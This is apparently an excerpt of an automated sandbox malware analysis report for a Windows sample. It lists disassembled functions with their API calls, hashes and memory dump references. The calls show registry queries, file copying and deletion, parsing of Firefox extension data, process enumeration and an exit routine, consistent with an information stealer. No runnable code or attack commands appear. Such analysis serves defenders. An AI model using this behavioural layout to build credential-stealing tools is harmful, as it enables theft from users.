Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 993481826590c165bb56778608f11084b5f00f09fbb0b0d72ec3ad596bd95013
Instruction ID: febb55ea9c25d327882697e636a71ffa50e804c050335bb8c0eb402118f4e0d8
Opcode Fuzzy Hash: 993481826590c165bb56778608f11084b5f00f09fbb0b0d72ec3ad596bd95013
Instruction Fuzzy Hash: 0821C531741218ABDB14AB25CCC4BAE77B9EB8A744F50451EF943B7A80EB707D00C799

Function 004178A0 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 004178D7
HeapAlloc.KERNEL32(00000000), ref: 004178DE
RegOpenKeyExA.KERNEL32(80000002,02719998,00000000,00020119,?), ref: 004178FE
RegQueryValueExA.KERNEL32(?,0273A540,00000000,00000000,000000FF,000000FF), ref: 0041791F
RegCloseKey.ADVAPI32(?), ref: 00417932

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: d4f8544a164a9437c7f2146de9882181f67f3b24d4450b32dfc713e681060546
Instruction ID: 7b98265181db112957e654b40feb51e707849e62a0e01f8308d40af4a82c50e7
Opcode Fuzzy Hash: d4f8544a164a9437c7f2146de9882181f67f3b24d4450b32dfc713e681060546
Instruction Fuzzy Hash: EB11C1B1A04605AFDB10CF84DD4AFBFBB79FB48B10F10411AF605A7280D7785805CBA5

Function 004012A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
HeapAlloc.KERNEL32(00000000), ref: 004012BB
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 004012D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
RegCloseKey.ADVAPI32(?), ref: 004012FF

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: b8563e144584e458f87bf561f54c88dffa2f1145a5d88f54fd71737305c450da
Instruction ID: 190bc7a1a7c8d7045dc387aced5cbf31aaec2b72b8248f43f4a0638ea244b090
Opcode Fuzzy Hash: b8563e144584e458f87bf561f54c88dffa2f1145a5d88f54fd71737305c450da
Instruction Fuzzy Hash: 34013179A40208BFDB10DFE0DC49FAEB779FF48710F108158FA05A7290D6709A05CB50

Function 00410580 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,02736A98), ref: 004105DA
StrCmpCA.SHLWAPI(00000000,02736A68), ref: 004106A6
StrCmpCA.SHLWAPI(00000000,02736A78), ref: 004107DD

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Strings

@ZA, xrefs: 00410880, 00410894, 00410643, 0041075B, 00410646, 0041075E, 00410883

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpy
String ID: @ZA
API String ID: 3722407311-3461648394
Opcode ID: c483ae9b79d0767531996660c11cba4100f1dd596d0a56d972fd2852602f0681
Instruction ID: dd73e37cf26ee0a5b727ab7f8fa236140303cf2c4538d3aa2ff7e25b79bad790
Opcode Fuzzy Hash: c483ae9b79d0767531996660c11cba4100f1dd596d0a56d972fd2852602f0681
Instruction Fuzzy Hash: E6917775B002089FCB28EF65D995FED7775BF94304F00812EE8099F291DB349A59CB86

Function 004105A5 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,02736A98), ref: 004105DA
StrCmpCA.SHLWAPI(00000000,02736A68), ref: 004106A6
StrCmpCA.SHLWAPI(00000000,02736A78), ref: 004107DD

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Strings

@ZA, xrefs: 00410643, 0041075B, 00410646, 0041075E

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpy
String ID: @ZA
API String ID: 3722407311-3461648394
Opcode ID: fc998fdfc7e39f7ab4b68045de1ed52666e90aabc0f549348e332771e86086b8
Instruction ID: 4e5c4e7109811dd04489307e57989d734427ebddea2fc0f69e8a4a25ed86313c
Opcode Fuzzy Hash: fc998fdfc7e39f7ab4b68045de1ed52666e90aabc0f549348e332771e86086b8
Instruction Fuzzy Hash: 82819775B002089FCB28EF65D995EEDB7B5FF94304F10812DE8099F251DB34AA45CB86

Function 00409FF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(02736918,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,0040FF93), ref: 0040A00D
LoadLibraryA.KERNEL32(0273A640,?,?,?,?,?,?,?,?,?,?,?,0040FF93), ref: 0040A096

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A1F0: lstrlenA.KERNEL32(00000000,?,?,00415634,00420AC3,00420AC2,?,?,004165B6,00000000,?,02716658,?,004210DC,?,00000000), ref: 0041A1FB
Part of subcall function 0041A1F0: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A255

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

SetEnvironmentVariableA.KERNEL32(02736918,00000000,00000000,?,00421290,?,0040FF93,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00420AE6), ref: 0040A082

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0040A002, 0040A016, 0040A02C

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-4027016359
Opcode ID: 5d2a90a6c287a6557149ce0161bdfd0811a73f4c6552fb1d61ddfcb96676ba5b
Instruction ID: 756634b6078292b8205bba75648758324288abb3cd7bb3e0efd9893355994f5a
Opcode Fuzzy Hash: 5d2a90a6c287a6557149ce0161bdfd0811a73f4c6552fb1d61ddfcb96676ba5b
Instruction Fuzzy Hash: 8D41E471804604AFC724EFB4EC56BAE3776BF48324F15512EF405A32A0D7B85986CB97

Function 0040A1B0 Relevance: 6.4, APIs: 4, Instructions: 360filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 00418600: GetSystemTime.KERNEL32(?,02718CD0,0042059E,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418626

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A231
lstrlenA.KERNEL32(00000000), ref: 0040A5EA

Part of subcall function 00409E60: memcmp.MSVCRT ref: 00409E7B
Part of subcall function 00409E60: memset.MSVCRT ref: 00409EAE
Part of subcall function 00409E60: LocalAlloc.KERNEL32(00000040,?), ref: 00409EFE

lstrlenA.KERNEL32(00000000,00000000), ref: 0040A32D
DeleteFileA.KERNEL32(00000000), ref: 0040A671

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$AllocCopyDeleteLocalSystemTimememcmpmemset
String ID:
API String ID: 3258613111-0
Opcode ID: e734056ccadb85596fb8f5aed4b693196bfad8cdfc587405413e23d9b6c5eb1a
Instruction ID: babd7ff3150fa9bd4e199d5026f054df416ea87c2dc191fa558e2381e0c2d671
Opcode Fuzzy Hash: e734056ccadb85596fb8f5aed4b693196bfad8cdfc587405413e23d9b6c5eb1a
Instruction Fuzzy Hash: 17D12472811108AACB14FBA5DC96EEE7338AF14314F50815EF51772091EF786A9CCB7A

Function 0040D5C0 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 00418600: GetSystemTime.KERNEL32(?,02718CD0,0042059E,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418626

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D641
lstrlenA.KERNEL32(00000000), ref: 0040D7DF
lstrlenA.KERNEL32(00000000), ref: 0040D7F3
DeleteFileA.KERNEL32(00000000), ref: 0040D872

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: b166229ad53b2f5ded9cc449bcce3d6f5e41e3adb138591f8cec19b0779d6888
Instruction ID: b9a8a4b288ee9f939e53bd87e1647cffb120ee14b7120403b064e1d16f2d4ef2
Opcode Fuzzy Hash: b166229ad53b2f5ded9cc449bcce3d6f5e41e3adb138591f8cec19b0779d6888
Instruction Fuzzy Hash: DC814472911108ABCB14FBB1DC96EEE7339AF54318F40452EF40772091EF786A58CB6A

Function 0040F2E0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Part of subcall function 00409A10: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409A3C
Part of subcall function 00409A10: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A61
Part of subcall function 00409A10: LocalAlloc.KERNEL32(00000040,?), ref: 00409A81
Part of subcall function 00409A10: ReadFile.KERNEL32(000000FF,?,00000000,00410127,00000000), ref: 00409AAA
Part of subcall function 00409A10: LocalFree.KERNEL32(00410127), ref: 00409AE0
Part of subcall function 00409A10: FindCloseChangeNotification.KERNEL32(000000FF), ref: 00409AEA

Part of subcall function 004188D0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004188F2

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421524,00420D7A), ref: 0040F38C
lstrlenA.KERNEL32(00000000), ref: 0040F3AB

Strings

^userContextId=4294967295, xrefs: 0040F3DC
moz-extension+++, xrefs: 0040F3ED

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$ChangeCloseCreateFindFreeNotificationReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 2768692033-3310892237
Opcode ID: 7f0b90c16998725d9a20467a6e8f2dfc1d7f4f633a656628a27d2e5fcf928163
Instruction ID: 29c62e45bd112fa8e6d3d1c16e218030d21c495d55cc38802304d1b40baba72e
Opcode Fuzzy Hash: 7f0b90c16998725d9a20467a6e8f2dfc1d7f4f633a656628a27d2e5fcf928163
Instruction Fuzzy Hash: D2513175D01108AACB04FBB1DC56DEE7338AF94314F40812EF81767191EE7C6A58CB6A

Function 00418120 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041816A
Process32First.KERNEL32(?,00000128), ref: 0041817E
Process32Next.KERNEL32(?,00000128), ref: 00418193

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

FindCloseChangeNotification.KERNEL32(?), ref: 00418201

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpy$Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 3491751439-0
Opcode ID: 1c0ad9731fc235f0809ae40197d29312941f037fbe712dbf38eee7264c2240ef
Instruction ID: 6084a3a81ad9197a86b05fcc5bdad381a42aa545a74b9a2169b69cd5b8afd334
Opcode Fuzzy Hash: 1c0ad9731fc235f0809ae40197d29312941f037fbe712dbf38eee7264c2240ef
Instruction Fuzzy Hash: 8E319E71902218ABCB24EF95DC45FEEB778EF04710F10419EE50AA21A0DF386E85CFA5

Function 00416593 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02716658,?,004210DC,?,00000000,?,004210E0,?,00000000,00420ADA), ref: 0041656A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416588
CloseHandle.KERNEL32(00000000), ref: 00416599
Sleep.KERNEL32(00001770), ref: 004165A4
CloseHandle.KERNEL32(?,00000000,?,02716658,?,004210DC,?,00000000,?,004210E0,?,00000000,00420ADA), ref: 004165BA
ExitProcess.KERNEL32 ref: 004165C2

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
